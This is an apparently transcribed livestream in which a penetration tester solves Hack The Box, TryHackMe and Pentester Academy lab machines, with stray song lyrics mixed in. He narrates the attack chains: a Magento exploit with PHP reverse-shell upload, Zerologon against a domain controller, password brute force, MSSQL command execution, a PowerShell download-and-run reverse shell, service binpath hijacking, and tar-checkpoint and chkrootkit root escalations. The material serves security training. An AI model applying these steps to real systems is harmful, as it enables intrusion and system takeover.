come in different shapes and forms.
Happy Tuesday, hackers. Welcome to Saturday. Nope, that's not right. Today is Attack on Tuesday. My name is Taggart, and we are going to be going after some Hack-the-Box box, and then we're going to be cleaning up one that we started last week, Swag Shop, if you're familiar with it. And then we're going to dive right into a Try Hack Me challenge. We're going to be doing an attack against a domain controller, going from boot to root on a domain controller. So, pretty excited for this stream. It should be a lot of fun. Should be a lot of learning. And I'm really excited to knock Swag Shop off the list because I didn't like the fact that we weren't able to finish it last time. And let's get that camera focusing. Or not. Hopefully it'll figure itself out. There we go. Alright, so let's dive right in. So, where were we last time? So, the last thing that we did with Swag Shop was we were able to use a search exploit database. We found out that the web application in question was a Magento application that had a known exploit. So what we did was we finally were able to get this Python exploit working once we got the correct URL sorted for the target. And I have gone ahead and rerun that exploit on this room just so that we're kind of back to where we were. So now the trick is we're going to try to get a file upload that allows us to upload a PHP file. And I believe I still have a shell here in my folder. Let's see. Okay, there's mt.php. Let's see if my address is still the same. 10.10.14.19. Let's, Yep, it's all good. What's up, Panda Cat? Good to see you. Alrighty. And we're gonna need some good tunes for this. I think what we're going to do is we're going to play some Wolf Club. So their album just came out, Just Drive Part 1. Check it out on Spotify or Bandcamp, I believe. So we'll get that going. Let's go to work. All right. So here we are. We're going to go ahead and make a new product in our Magento database. So again, we were able to run that exploit and get the admin creds that we needed. And we're going to do just a simple product. Go ahead and continue. Not the most creative description or short description ever, but that's okay. We're really the only ones who are going to be using this. It is enabled. Yep, it is visible in catalog and search. All right, all good so far. And we're going to save and continue edit here. And then from here, we're going to go to custom options. Do let me know if the music's too loud, too quiet, whatever. I know the mixing can be a little bit funky, especially when there's lyrics. All right. So we're going to add new option. One of the more interesting things that we can do here is we can create a file upload. And we're going to allow file extensions of PDF, PNG, and PHP. And that gets us past the file upload issue that we sort of identified. Not really. It's just that you got to set up your allowed file extensions. And then let's save it. Oh, the price is 1. Tax class. It's not taxed. Our exploit is not taxed. All right. and it is enabled. So if we, in another window, I'll just open it up in incognito, go to 10.10.10. What is it, 140, right? We should, not admin, we should see the product. I trying to remember what we needed to do to get this going before, because I know that, oh, we need to add a quantity. How many are in stock? Because if it's 0, it won't show inventory, right? There is currently 1. All right, let's go back to that. Let's reload this. Oh, come on. Yeah, it's enabled. Let's say that there's 100 of them. Oh, there we go. Stock availability. In stock. That's what we need to change. Now, I believe... Yep, there it is. Now we can see this thing. Let's go ahead and click on it here. Now, I'm trying to remember... Did I do... Is this a interpreter shell? No, it's just a straight up reverse shell. It's not super fancy. So what I'm gonna do is the port is 8888. So instead of setting up an interpreter listener, I'm gonna set up a netcat listener. I'll set that up down here on port 8888. All good so far. Now this enumeration is taking a million years. I'm going to see if I can make it go a little bit faster by rerunning Ferox Buster without the recursion. I'm going to knock off the PHP extension here. And I'm also going to set up... I'm going to kick this up to 15 and 15 just to see if I can push the pressure on the web server just a little bit without getting it to error out. That's a little bit better. See what we get there. The trick is we're looking for the directory that files are going to get uploaded to. Without that, we can't really find the thing that we upload. We can go ahead and upload it, but we won't be able to get at it until we find that directory. So we can choose the file, and we'll choose the empty.php here. And we'll add it to the cart. That uploads the file. But if you see here, with our URL, this is going to be a little bit funny. If I click on this, it won't actually let me view it. It'll download the file, which is not what we want. We want to directly access the file, and that's why we need the discovery of the media folder. Now we can kind of cheat a little bit. We do know that it's in media, so if we can't get the discovery going, you know, it is what it is. We did have that discovery last time. And there's custom options. And there's quote. There's M. T. And then here's this PHP file. Now, it's not what we uploaded, but it's not the file name that we uploaded, but that's what we uploaded. So if we click on it, look at that. This turned into a shell. We can kill the discovery now that we have that. So we have ourselves a shell. I'm going to bring this up a little bit. There we go. And zoom it in. Make it a little bit easier for everybody to read. Okay, So let's begin our basic enumeration of this Linux system. Let's see, what are we? Okay, it's Ubuntu. Let's do @etc lsp release. 1604, so it's nice and old. That's good to know. We'll have a lot of options for pwning this thing. Let's see, who am I? We're dub data. Not that surprising. Okay, looks like I'm in the root of the file system for some reason. Not what you would normally expect from one of these. But, yeah. Let's see. So there is a home folder, Paris. Let's try that again. Home, Paris. Okay. And it looks like we can actually read the user flag from here, so let's go ahead and get that out of the way. I'm reneging on the Wolf Club. It's not quite the energy I'm looking for tonight's stream. Although I do like them. Let's try this out a little bit. That's better. Alright, let's go submit that user flag. Now, I'm going to rate this as not too easy, just because we had such trouble with the one exploit before we got it. Interesting that the spread here seems to be favoring a bit hard. Alright, so we have our shell. Now, we don't have a great shell, and so what I'm going to try to do is cd var... Actually, let's lsal and see... Okay. Okay, I can write in here, which is great news. So I'm going to do that. I'm going to create an interpreter shell here. And this is... I missed... That was it. Is it 32-bit or 64? It is 64-bit. So we're going to make a 64-bit interpreter shell. Yeah. 10.10.14.19. And the L port we're going to do is 8889. Great. We'll let that build, and then over in our Metasploit console, which we need to spin up, we'll use exploit multi-handler. Okay, we'll set the L host to 10.10.14.19. We'll set the L port to 8889. We'll set the payload to Linux 64 interpreter reverse TCP. Looks about right. Alright, so that handler is started. Let's get back over here. And let's fire up a web server to get that over with wget. 10.10.14.19 port 8000/MT. Alright, chmod +X to get that thing ready to run. Fire it off, and we have an interpreter session. And that's just going to be a more stable shell for us, is basically what's going on there. And I'm using Python 3 to stabilize my shell and give myself an actual TTY here, or sudo teletype terminal. And now we have some work to do. Let's do, before uploading anything else, let's just do some basic enumeration. Let's see. Let's in var backups. If there's anything fun in there. Let's see if, for whatever insane reason, they gave the web server user the ability to run something as sudo. Okay, they did, which is bananas. But okay. Let's try this. So we're in var dub HTML. We're going to echo hello to hello.txt. So now we're going to use, this is going to be an easy own if this works. So we're going to do sudo user bin vi. Vi is a great, Vi and Vim are great privilege escalation paths if you can get them. Very rarely is it configured like this in real life. But for whatever reason it is here, so we're gonna var dub HTML hello.txt. So now what I'm gonna do is I'm gonna run the shell command bin bash -p, and I'm hoping, yep, that gave me a root shell. Because we were running vi as root, and then we told bash with the tac p to inherit the permissions, so I am now root. Let's get that root.txt. And that is Swag Shop done and dusted. I'm gonna have to call that one pretty easy. Just because it was a pretty obvious escalation route. Okay, so real life applicable. The Magento was, so we'll give that a 5. Common vulnerabilities, yeah, Magento's real. Enumeration, I think so, just because we needed to find that media folder to upload it. Go ahead and submit that. All right. That is Swag Shop done. So we'll kill all of this. And we'll bring down the VPN connection for that as well, because we're going to move over to try Hack Me. And this is most of what I wanted to do tonight, now that we've got Swag Shop out of the way. Close this. Okay, I think we're ready to go. So this is the room... that actually went too fast. I gotta start this machine right now. Let me connect to the VPN. I know for a fact this machine takes a while to spin up. But what are we working on here? So US Tune, or whatever, however you want to say it, is excited. Thank you so much for the follow. So without giving too much detail here, what we're going after is a Windows domain controller. So we're going to do all the fun Windows stuff. So we're going to do a little bit of... I was tapping on this last night, and just seeing what we could do with it. And so I suspect what we're going to be doing is maybe a nice kind of known exploit. It's pretty new. I also think we're going to be doing some crack map exec. So for some user enumeration, so that should be fun. And then after that, we'll see. But yeah. While we're waiting, because I do want to wait about another 5 minutes at least for this thing to power on and boot up. If anybody has any questions, career-wise, certifications, technologies, whatever you want to talk about, phone lines are open. And maybe I'll pop in and do an attack defense lab real quick. Am I not logged in? I'm logged in. Shared server, what are you about? Oh, turns out I'm not logged in. That would explain why stuff I thought I had done wasn't there. Come on. Exploitation. Nope. Privilege escalation, that's what I wanted. Alright, we'll try cron jobs got wild. Let's see if we can knock this off quick. This shouldn't be too crazy. It is, after all, in the basic section. I apologize for the shiny forehead. It's very warm in this room with fans off for recording purposes. Yeah. We want that to get to 50, and then we'll go to work. This is an interesting box, because I think one of the things that I found just as I was kind of poking at it last night is that a lot of the older Windows machines on Try Hack Me, their evaluation license has expired. No one went and rearmed the license manager. And so you don't actually have 2 hours. You have an hour, and then the thing will power off. Whether it says that it has or not. It'll just die on you after an hour. So this is a very tight time situation, and if we have to, we'll terminate it and bring it back up if we're getting close to an hour. The IP address will change, but hopefully the information won't. Okay. I don't need any of this open right now. Okay. Let's try this out. That's big enough to be legible, right? Okay, so let's see what's going on. This is cron jobs gone wild, right? So let's see. We'll cat Etsy cron tab. Let's see what's corn tab. All right, not a whole lot going on there. There's only one user. To run multiple system maintenance tasks. A byproduct of this task is the creation of a tar file in /tmp. Oh no! That's not where I want to be. interesting. So we're going to look for anything on this file system that has the term monitor.tar.gz in it, and just see what happens there. See if there's a script that has... Should probably give it the root file system, huh? That might take a minute. This right here, I think a lot of people will see this command, but if you haven't been explicitly told what it is, it's kind of tricky. So the 2 is a file descriptor. So there are 3 basic file descriptors in Linux. There are more that you can define, but 0 is standard out or standard in? I think it's standard out. And 1 is standard in, and 2 is standard error. So what we're doing here is we're redirecting with this here, this output redirection, we're redirecting the standard error results, anything that would show up as an error here on the console. We're redirecting it to dev null, so we're just throwing it into oblivion, basically. We don't want to see errors, just results. B#, what do I have to do? Fix the cron job? No, what we're supposed to do is exploit the cron job to gain root on the system. That's the plan, anyway. This is going to take forever. See if we can find something that's running. No, this is actually not it. We can't see it here. One of the funny things about the Pentester labs, or the attack defense labs, is that they're isolated in such a way that you can't really get stuff onto them. So I can't bring pspy or anything on here. I got to work at it a different way. Well, you know what? We'll let that run and see if we can just poke at it every once in a while. But this looks like it should be about ready to go. So let's get started here. The first thing we're going to do is we're going to run Rust scan against it. And we'll output to active. Okay, so 53, 88, 135, 139, 389. This, you know, it looks like a Windows server. It looks like a Windows domain controller. 53, so we've got DNS. 88, we've got NetLogon, Kerberos. We have Windows RPC and CIFS. We have LDAP. We have SMB. We have LDAPs. No idea. RDP. So pretty familiar ports here, and some things that we can know right away that we can use to begin enumeration. So the first thing I'm going to do is fire up good old enum for Linux and give it this and see if it can do anything. Now, enum for Linux is great for enumerating SMB shares and Kerberos information, NetBIOS information, all sorts of stuff like that. But we might not be able to do this without giving it some actual data. Some of which we may get back from Nmap. Right? It's things like the actual domain that this thing is supposed to be part of. Also, depending on how old this is, because here's the thing, if it's dying because it's so old that the evaluation license has expired, right? That's older than 90 days. Now, we don't know how old it is exactly. I guess there's a thing somewhere that tells you when it was released, but I gotta tell you, I think that that is a free room. Okay. But no date. Oh, the 71 days old. Perfect. Yeah, this isn't really working for us. But let's try SMB client. For SMB shares, I actually really prefer SMB client to Enum for Linux. It just works better for me. Your mileage may vary. But, you know, even if I don't give it good creds, it'll still give me share names back. See? Alright, so we've got admin, C, IPC, net logons this fall. Okay. So there's something I want to try, and I don't know if I'm going to get lucky or not, but I want to try it. CVE 2020-1472, also known as Zero Logon. If this thing is vulnerable to this, it will allow me to use the machine account to authenticate to some of this stuff, and maybe do code execution right from there, or at least get other information for access. So we're going to give that a shot. Let's see if Nmap gave us anything useful. It did. Okay, so we have the NetBIOS name, DC01, and the computer name, or the domain name is DC01. And the computer name is DC. Interesting. Now the DNS domain name is ustune.local. Alright. So we care about this. Because if with Enum for Linux, we could give it... I think it's capital U, but let's just be sure. Yeah. We'll get the users. Oh, lowercase is user. And the work group. So if we do Enum for Linux with a work group of DC01, and we ask for the users, okay, so we couldn't find users that way, but we want to try that 0 day. It's not a 0 day anymore, I guess. It's just a straight up vulnerability. So we're going to do git clone. And basically what we do with this one in Python 3. I know this because I was running it at work the other week, actually, to test some of this out. But, okay, so we'll run -h to get the help for it. And so we give it the domain controller name, and we give it the DC IP. So we know that the domain controller name is DC, which we learned from our Nmap scan, and the IP is right here. This can take a while. Let's go check on that other grep scan that we're doing. Still going. Come on. You think the cron job was the second process? Oh, I mean, cron is running. We just don't know what it's running, you know? And because I can't load... The attack defense labs are very, very isolated. Because I can't load P-Spy or anything else in there. I'm trying to see if I can find the script that it's running. And I may not be able to do it this way. Oh, snap. That actually worked. No, be sharp. Don't apologize. It was a good thought. But yeah, so let's dive into that for a second. So we can see, you know, PS is very permission limited. We can see that cron is running, but unfortunately we don't have any more information than that. Now it's possible that we could maybe catch the script running, depending on if it runs every minute and we catch it like the second that it runs. We might be able to do something like that. We could try that actually. We'd say like while one do yes aux and sleep 10. Done? Is that right? No. So now this will just loop every 10 seconds and give me another PS. And, you know, maybe we'll get lucky and catch it. But I don't think so. We'll let it run for a little bit, though, see if we catch it. Meanwhile, we actually were able to change the password of the machine account. So, Windows machines have a machine account. It is the name, it's the host name with a $sign. And it tends to be a pretty powerful account, depending on what it's configured to do. So, we're going to try to use it to get some information here. Let's try it with enum for Linux now that we have this information. We'll try to do a user enumeration. And now that we have a user, it's going to be DC with the $sign. And the way that this exploit works is it changes the password to an empty string. Allows sessions. Yo, now we got some information. Look at that. We have some information now. We have administrator, we have guest, we have KRBTGT, and we have SVC curb. That's interesting, right? The Kerberos account is interesting. KRBTGT would be cool too. Now, let's see what else we had in that active.txt. So we had LDAP. We had remote desktop. And do we have anything else? I'm expecting something here that I'm not seeing. I'm going to run it again. There it is. 1433. MSSQL. So we have another service that we can actually use. This is where CrackMap exec starts to come in handy. So we're going to try CrackMap exec. Let's run help with it. We can learn some of the things that we can do. So we're going to do CrackMap exec with SMB first. And then we'll get the help for that. What can we do there? So we already have users, right? Actually, just kidding. Before we do that, let's see if we can RDP to the thing. You know? So let's try our desktop, the IP address, and actually, let me get the help up for our desktop just so I remember the... Everything uses different flags for username and password, you know? Okay, so so that's the user. The domain is going to be DC01. So the R desktop, the U is going to be DC. The domain is going to be DC01, and IP address. Do I trust the certificate? I do. But apparently I don't have the right Kerberos stuff set, so I can't make that happen. But that's okay, because we have CrackMap exec. And we'll see what we can do here. Let's see if we can dump SAM hashes. That would be cool. And I believe with CrackMap, we do... The target is the last thing, so all the options come first. So SMB, we'll do SAM, and we'll say... U and P, UP and D. Okay. So U is going to be DC, the P is going to be empty string, and then the domain is going to be DC01. And then we give it the target. And go ahead, CrackMap exec. Show me what you can do. We have not once been able to catch something fun going on here, sad to say. There's another trick we can try, which is we can sort stuff in certain paths. Excuse me, less is not found? What we're doing is we're looking for the most recently changed things. The idea being if there had been like a user local bin or something like that, binary that had been changed recently, and that's where the script was running, that would have been cool. No dice, though, unfortunately. Alright, let's focus on the thing we're actually doing well here. Alright, doesn't look like we were able to dump the SAM creds here. But... let's try with MSSQL, because we know that we can do stuff. Oh, MSSQL doesn't have that. Well, let's see what we can do with MSSQL, since that's another attack vector. Well, we have the ability to do command execution. So let's do that. That's not going to work. Domain DC01. And then the command is going to be who am I. Let's see if that works. Gotta get rid of that SAM option. Okay, so login failed. But we know that it's there, but it's possible that's because we need to use local auth, right? Not domain authentication here. So we'll set that up. Local auth. The idea being that the machine account is part of the machine, right? It's not part of the domain, really. Oh, domain is not allowed with local auth. Well, that makes sense. Okay, that didn't work either. But I'm not entirely certain that I'm using it, you know, correctly. But it's entirely possible that also the machine account doesn't have permission, right? If MSSQL was set up to be Active Directory joined, then I won't be able to make that work. But I might be able to do something else, which is use crack map exec. It's kind of a shot in the dark, but you know, it's worth giving a shot, I suppose. So what we're gonna do is we're gonna do crack map exec, MSSQL. Remember that we got all those other users, right? We got from enum for Linux, we got SVC curb. So we're gonna try that. We're gonna try against SMB. I think it's a lighter weight protocol. So we're going to try it against SMB curb, and then the password, the way this works is you give it the word list, which is it, chair, word list, rock you, yes. We'll see how this does. Okay, not great. Care about the kind of quotes I'm doing? Yeah, no, that should be working. Not text.io wrapper. Gonna go ahead and Google this problem. See what's going on here. Keep this search going. Well, this is Marcello's own documentation over here, but... Oh, the positioning is different when we do this. .10.10.86.147, and that should work. Indeed it does. Okay. Cool. We have Superman as a user, so then we can go back and try... to execute a command with MSSQL here. Oh, we've got to try local auth. I don't know if we have to, but we'll try it. Okay, the authentication succeeded, the code didn't, but we have some other options. How are we doing on time? "25 minutes. There. That's what I wanted. MSSQL exec. This is a really nice package that set username to svc curb dash curb, right? Set password to Superman. And let's give that a shot. Oh, hey, that worked. So we have code execution on this machine. We have some privileges, but not a lot. We have an impersonate, which is interesting. So we could run as other people. And we can create global objects, but we can't increase the working set. We don't have debug either, which would be, you know, for Mimikatz useful. So it's a little limited, But that doesn't mean that we can't do anything. It just means that we have to be a little bit more clever about it. Now, before I get on this system, the other thing I want to do is I want to see if I can find what's running on the machine. Just so I know what to expect. Okay, we got WinRM, which we didn't even try, but that might be cool. Okay, Windows Defender is running, and we need to know about that. Basically, what that means is that Meterpreter is out. We're not going to be able to do anything like, you know, the easy button with getting a Meterpreter shell or anything like that. We're going to have to be a little bit more hands-on about it. Awesome. This is exciting to me for reasons which may become clear in a minute. And anything else?
You were like me once, but things changed. I can't believe this is you.
All looks pretty normal.
Right now. Do you remember all those times we
Yeah, all looks pretty normal. So I think from here, it's time to get some stuff onto the machine. So to do that, let's actually set CMD. Let's run this just to see what's in the users folder.
It's bittersweet, but the rest is up to you. You will remember in time. It's a new programming. Your true self awaits you.
Okay, so we have a user of svc-curve.dco1. We have a folder. That's real handy because, you know, presumably we can write to our own user folder. So we'll do that. What are we going to write? Let's go back here. What we're going to do is we're going to get... yeah, we're going to cp scripts, shells, invoke, PowerShell, TCP, one line, .ps1, and we're going to copy it over here. This is a great little piece of PowerShell, and what it does is it invokes a reverse shell. That's what it does. The one-liner I like because it's so tiny, and it doesn't require a bunch of command line arguments. You set it up in the code here, and that's kind of it. So we're going to set up a listener for 10.13.7.20, 19 minutes, 80. Okay, Python 3.
Incoming transmission.
We'll set up the listener over here. And then here we're going to set the CMD to PowerShell.exe, no profile, window style, hidden, C, and actually, we're going to do this in quotes. Then invoke web request, URI HTTP ://10.13.7.20. For 8000 slash... Oh, just kidding. Let's move the invoke to something a little bit easier. IPS.ps1. Yeah, ips.ps1. And then the out file, which we need, is going to be C users svc-curb.bc01 / ips.ps1. Run. Hopefully that didn't miss. Okay, it didn't. We got a hit from the Windows machine. So invoke web request fired, and it downloaded the PowerShell script. So now we're going to set our command to exactly that. And we're going to run it. That's not going to work because I forgot to do... Uh-oh. What's using 8080? Oh, Zap is using 8080. Duh, of course. But that wasn't going to work anyway. Well, actually, maybe it will. Yeah, it did. Okay. We have a shell on this machine. How about that? Now we're gonna have to do some other evil. There are some tools, 15 minutes. There are some tools that I don't have right now that I want, and I should have gotten them. What I want is access check. What this is going to allow us to do is... really racing the clock here. What we want to do here is we want to get access check onto the machine. So again, we're going to do invoke web request. 1.13.7.20 8000 / access chick 64.exe out file access chick 64.exe. Okay, download is working. It's like, this is the smoothest stream I've had in like a couple of weeks. Of course, there's like nobody here. I'm glad everyone who is here is, though. Yeah, this is a good night. Okay, we've got access check going. Now, we're gonna run access check. Let's run it with the help just to see what it can do. What this allows us to do is see kind of what the write permissions are for files as well as services, as well as directories. That's not how you spell EULA. So this is the help, and we kind of combine these option flags. So we're going to do the C because we want to go after a service, and we're going to suppress the errors. That's the U, and then the W, so to show only objects that have write access. So we're going to do access check 64.exe. Now I said that I was interested in that USO service, and you're going to see why. So we're going to do accept EULA CUW USO SVC. I can't believe I did that. Again. 4.exe, accept EULA, CW, USO SVC. Okay. This is awesome news. We are a service. Which means we can mess with this service. And that's exactly what we're going to do. Alright, so first of all, we're going to run... We can't use Meterpreter because we know that's going to get caught, but we can probably use a lower power shell and see if we can get something. So we're going to do... we're going to list the payloads, and we're going to grep Windows, and then we're going to grep reverse and see what we get here. Okay, so Windows XE4 shell reverse TCP should be fine. So we're going to do MSF Venom, T, Windows XE4 shell reverse TCP. Now the format is going to be exe. We'll call that mt.exe. The L host is good. The L port we'll set to 8443. So we'll build that. How are we doing on time? 10 minutes. I think we can do it. So let's see if we can stop this service. sc.exe stop USO SVC. Stop pending. We can stop the service. Okay, so we're able to mess with the service. So what we're going to do is we're going to replace it with our own executable, which we're about to go get. So here we're going to invoke web request. URI HTTP 10.13.7.20 port 8000 / mt.exe out file mt.exe. Okay, we have it. Now this is the part where we need to configure the service. Let me look up the documentation for this just so we can see it. sc.exe config. So what we're going to do with the service configuration is we're going to modify its bin path. So if we can point the service bin path to another executable, like this reverse shell we're about to make. And let me bring that listener up over here on 8443. And then we're going to, over here, we're going to do sc.exe config USO SVC bin path equals C users SVC -curb.dc01 /mt.exe. And we were able to reconfigure it because, again, we had that read-write from up here. sc.exe start USO SVC. And if all goes according to plan, this window on the left here should become our system shell. And that is system on this machine. We've now owned this domain controller. Okay. Let's Okay, there's user.txt. So let's get that for the user. MSSQL is cool, huh? Well, I'd have to agree, since that gave us our foothold. With 7 minutes remaining. Okay. GPOs. Interesting. I wonder if there was another... I mean, I'm sure there were a lot of other vectors that we could have followed here. But yeah, we got it. So, just to recap, we were able to use the zero logon vulnerability to gain some ability to get information. We were able to enumerate users after that. And from there, we were able to use the MSSQL after we brute forced the password for for the SVC curb account. We were able to do MSSQL code execution, which got us our foothold. And then we exploited the USO service, which is configurable by service accounts, right? So since we had a service account, we could stop it and then reconfigure it to whatever we wanted. And when it came back up, we had a system shell. And that is how we did that. All right. So I hope that was a good stream for everybody. I think that's pretty much what I wanted to cover tonight. Well, with a couple minutes, let's see if we made any headway here. None at all. Nothing. Yeah, nothing fun in there. Oh, we did that one already, didn't we? Yeah. Yeah. Don't think we're gonna find cron stuff there. Oop, sorry. Let me kill these. There is a var log monitor. Ooh. I think I know what this privilege escalation is. I think it's tarring up everything in here. The problem is, of course, that... I hate this exploit. I hate it so much. Basically, you can set up these checkpoints in tar to... Yeah, right here. You can set... these checkpoints inside of a directory. Yeah. And these checkpoints will be interpreted by tar as instructions for how it's supposed to execute. So basically what we're going to do something like this. We're going to do... Dang it. We're going to do echo tp bin bash temp, and then we're going to do chmod plus s to temp bash to shell.sh, which unbelievably I can write to. I didn't even think that I was going to be able to do that. Then we do these checkpoint things. And so basically we're echoing the empty string to this file name that looks like a checkpoint, and that's what messes up tar. Okay, and now we play the waiting game. Oh, good call. Thank you, GoPro. It's like, what's going on? Oh, I don't care. Wildtr do ls. Oh, yeah, okay. Okay, but it doesn't matter because we just got it. God, I hate bash scripting. Okay. So that's, there we go. I do not like the tar checkpoint exploit. You see it all the time in CTFs and things like this. And people who do Linux exploits really feel like, I think they have some funny ideas about how people use tar in real life. Okay. Well, we'll see if we can do one more of these. All y'all missed the victorious takedown of this domain controller. Fallen Guardian, what's your deal? I don't think it is that new. Look, it's 664 users. Or 71 days old, so it's new-ish. But it's nice, it's just a domain controller. Oh, that's why I didn't get the thing. I was like, what? But yeah. We were able to use zero logon against it. That was kind of my favorite part. A vulnerable version of a popular rootkit detection tool is being used by the system. It is vulnerable to publicly known privilege escalation attack. Okay. I'll get ready for search exploit here. Wait. Oh, did I not stop the other lab? Shut them down anytime. Why, thank you. I will. These are interesting little challenges. I like that they're focused, and I think it's an interesting constraint to work within that you can't load any tools onto the machine. Hunter, is this a Blue Team website? It's actually the labs for pen tester labs, so it actually has stuff for everybody. This is, despite the coloring, it is actually pretty red team. So you can see there's Windows Recon, basic exploitation, post-exploit. There's cloud stuff, Linux. It has a lot of great stuff. Now, it is paid. It's part of pen tester. Okay. I always get this wrong. PentesterAcademy.com. So this is the lab component of this site, and it's $250 a year, and I have to tell you, it's pretty worth it. Especially if you want these kind of focused challenges, and there are video courses to go along with all of these, right? So if you want to follow some course content, it's really, really solid for that. All right, let's see what we can do here. What you got for me, Jackie? Check down. Okay. That's not helpful. So are these allowed to be streamed? Yes, I asked the founder, Vivek, if it was cool to stream the Attack Defense Labs, and he said yes. I think the thing that he doesn't want streamed for good reason is the course content, right? So the videos that he and I think just he have spent a lot of time making, like, that's no good to stream, right? That's the course content. But yeah, he said that the lab material, all for it. And there's like YouTube videos and other people who've done it as well. I try really hard to make sure that I only stream stuff that I have permission to do, and I'll ask before doing it. For example, you know, I know that a couple of streamers on here have done the labs from INE for the eLearn security certs, and I don't know that that's cool. That seems like they might have an issue with it, because that's straight up course content. How are you not going to have less on this machine? Okay, check rootkit. Here we go. We can't use the Metasploit module, so let's see what this is about. The vulnerability is located in the function slapper in the shell script check rootkit. The line file port equals file port I will execute all files specified in slapper files as the user check rootkit is running. Slapper files is rootdir temp/.bugtrack. Put an executable file named update with non-root odor in /temp. Not mounted, no exec, obviously. Run check rootkit. Is that seriously it? Yeah. Alright. Unbelievable. Ugh, gross. And where is this going? Just update in temp.
been asleep in the driver's seat. I've been lost in my head for weeks, trying to find what it is I need. Too goddamn tired to sleep. And then there are other times I'm so aware that I lose my mind and never feel like I get enough. So high that I can't stand up.
Okay, so Checkdown is doing the work for me. And there's my set UID bash. Hooray! Nope, not there. Oh, yes. Alright. Well, I gotta say, it's been a fairly victorious evening. I think I'm gonna quit while I'm ahead here. So, let's see if we can send you someplace fun. Oh, you know what? Gamozo is streaming. That's awesome. You can see some amazing programming. DJX 120. I don't know them, but we can. What's their deal? Oh, yeah. All right. Off you go, friends. Thanks for hanging out. I'll be back tomorrow doing some programming. Till then, be good to yourselves, be good to each other. And I'll see you next time.